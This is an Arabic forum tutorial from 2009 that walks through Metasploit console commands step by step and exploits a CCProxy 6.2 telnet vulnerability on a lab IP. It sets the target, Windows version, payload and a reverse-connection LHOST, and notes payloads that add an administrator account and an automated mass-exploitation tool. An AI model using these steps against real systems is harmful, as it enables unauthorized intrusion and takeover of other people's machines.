عرض مشاركة واحدة
قديم 05-16-2009, 02:02 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Wolf_112
 
الصورة الرمزية Wolf_112
 

 

 
إحصائية العضو






Wolf_112 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Wolf_112 is on a distinguished road

.... استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


السلام عليكم ورحمة الله وبركاته


اخواني الاعزاء اعضاء منتدى العناكب اقدم لكم شرح بسيط عن Metasploit وطرق استغلال ثغراته

اخواني Metasploit يحتوي على الكثير من الثغرات وهو يعرض لك الثغره وطرق عديده للاستغلال وانت وشطارتك اخواني انا ما حبيت اني اعلمكم على طريقه واحده فقط انا ابي اعلمكم على الاساسيات في Metasploit علشان تبدأمن عندها الى الاحتراف باذن الله

اخواني انا منزل الصور من مدونة اخوي العزيز::br4v3-h34r7 جزاه الله خير لاني ما اشتغل على جهازي يعني اكتب لكم هالشرح وانا على جهاز اخوي<<<ماشاء الله مسوي يمون على الجهاز

والصراحه الموضوع يصلح اني احطه في قسم السيرفرت والاجهزه لان الطرق في المشروع للاثنين متشابهه نوعا ما والشائع في استخدامه للسيرفرات والمواقع اكثر منه على الاجهزه العاديه

المهم ما ابي اطول عليكم يلااا نبدأ الشرح""


بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…


لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلاله

نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit

بعد ذلك نقوم بتشغيل سطر أوامر مشروع Metasploit بتنفيذ الأمر:

كود:
msfconsole


*ملاحظه الشرح على الينوكس وانا لا انصح باستخدامه على الويندوز.


نكمل

اول ما يبدا في التشغيل راح يعطينا تفاصيل عنه مثل الاصدار والثغرات الموجوده .....الخ


لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي::

كود:
msf > help



ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة وهي "show"&"info"&"use"


نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها


نبدا بالأمر الاول وهو "show" علشان نشوف الثغرات الموجوده بالأدات في اصح تعبير

وعلشان ننفذ الامر في الاداة نكتب الامر هذا وبعدين نضغط انتر::

كود:
msf > show exploits


كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب

ولاظهار تفاصيل ثغرة معينه اكتب الامر"info" وبعده مسافه ويعده اسم الثغره اللي تبيها
مثال على ذلك:

كود:
msf > info windows/proxy/ccproxy_telnet_ping
بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية:



قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح
الان ننفذ الامر"use" علشان نستخدم الثغره
نكمل على مثالنا السابق
كود:
msf > use windows/proxy/ccproxy_telnet_ping
وتذكر بين كل امر وامر تنفذه نفذ الامر "show" علشان تشوف الخيارات اللي ممكن تسويه والطريقه الصحيحه في استغلالها
نكمل

و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة
مثال::
كود:
msf  exploit(ccproxy_telnet_ping) > show options
نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:


في الصورة السابقه قمنا بتحديد اي بي المستهدف بالأمر"set" وبعده الخيار "RHOST"
مثال::
كود:
msf  exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53
بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر"set" مثال:
كود:
msf  exploit(ccproxy_telnet_ping) > set RPORT 34
بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:
كود:
msf  exploit(ccproxy_telnet_ping) > show targets
نحدد الخيار 4 و هو نظام Windows XP SP2 - English بتنفيذ:
كود:
msf  exploit(ccproxy_telnet_ping) > set TARGET 4


أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:
كود:
msf  exploit(ccproxy_telnet_ping) > show payloads
مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر
كود:
msf  exploit(ccproxy_telnet_ping) > show options


يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر
كود:
msf  exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41
الأن لم يبقى علينا الا تطبيق الأمر
كود:
msf  exploit(ccproxy_telnet_ping) > exploit
مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر

الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit
كود:
./msfgui
لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع Metasploit كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا وهذا سوف اتطرق اليه في الموضوع الثاني ان شاء الله

طولت عليكم اخواني اتمنى انكم استفدتوا من الشرح خير استفاد واتمنى انه واضح واعيد ما قلته انا نزلت الصور من مدونه اخوي::br4v3-h34r7 علشان ما يطلع لي واحد الحين ويقول اني ناقله


اشكركم واتمنى لكم الصحه والعافيه اخوكم::wolf_112


hsjo]hl lav,u Metasploit , avp hsjyghg eyvhji fhgjtwdg

التوقيع

,

 


التعديل الأخير تم بواسطة Wolf_112 ; 05-16-2009 الساعة 02:28 PM.

   

رد مع اقتباس